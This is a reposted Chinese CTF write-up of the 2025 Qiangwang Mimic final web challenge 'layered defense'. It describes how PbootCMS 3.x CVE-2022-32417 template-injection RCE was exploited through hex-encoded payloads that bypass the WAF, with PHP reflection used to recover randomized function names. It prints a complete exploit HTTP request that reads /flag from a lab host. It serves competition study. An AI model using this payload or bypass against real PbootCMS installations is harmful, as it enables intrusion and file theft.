文章总结： 本文记录了2025强网拟态决赛云网互联赛道中Web层层加码赛题的解题过程。针对Web3.1关卡，作者利用PbootCMS3.x的CVE-2022-32417漏洞，通过十六进制编码绕过安全机制，并使用无动作函数读取flag。在Web3.2关卡中，由于新增了异构安全机制导致函数名被随机化，作者采用PHP反射技术获取完整函数名，并在此基础上修改利用代码成功解题。 综合评分： 85 文章分类： web安全,CTF

2025强网拟态决赛唯一解 云网互联赛道-WEB层层加码

d2550自留地

2026年5月25日 09:37 江苏

在小说阅读器读本章

去阅读

以下文章来源于ap0s ，作者ap0s

ap0s .

安全小白

云网互联赛道-WEB层层加码

利用前提： 采用了Web应用异构化架构设计，以及ModSecurity、OpenRASP、Waf的安全防护机制。

web3.1

先从3.1开始看起 因为这个关卡没有异构，只需要绕过其他的三个安全机制即可

使用PbootCMS 3.x 版本 CVE-2022-32417 远程命令执行POC

可以通过hex编码对其进行绕过，然后此关卡需要使用无动作的函数 读取 如show_source，highlight_file等，即可获取flag

web3.2

3.2新增了异构的安全机制，所以使用3.1是利用不通的 经过研究使用php反射可以获取完整函数名

ReflectionClass::export()

这里可以看到函数名受异构影响函数名已经拼接了随机字符串，所以无论如何利用都执行不成功

既然现在知道了问题，所以获取所需要用到的函数，然后在3.1的基础上进行修改即可

GET /?xa=}{pboot{user:password}:if((("\x63\x6f\x72\x65\x5c\x62\x61\x73\x69\x63\x5c\x52\x65\x73\x70\x6f\x6e\x73\x65\x3a\x3a\x6a\x73\x6f\x6e\x55\x37\x6e\x43\x66\x75\x49\x54\x79\x34\x70\x72\x4a\x41\x72\x32\x36")("1",("\x70\x61\x72\x73\x65\x5f\x69\x6e\x66\x6f\x5f\x74\x70\x6c\x55\x37\x6e\x43\x66\x75\x49\x54\x79\x34\x70\x72\x4a\x41\x72\x32\x36")("\x2f\x66\x6c\x61\x67","\x68\x61\x72\x64\x65\x72"))));//)}xxx{/pboot{user:password}:if} HTTP/1.1
Host: 172.29.60.28
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: lg=cn; PbootSystem=
Connection: keep-alive

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：d2550自留地 《2025强网拟态决赛唯一解 云网互联赛道-WEB层层加码》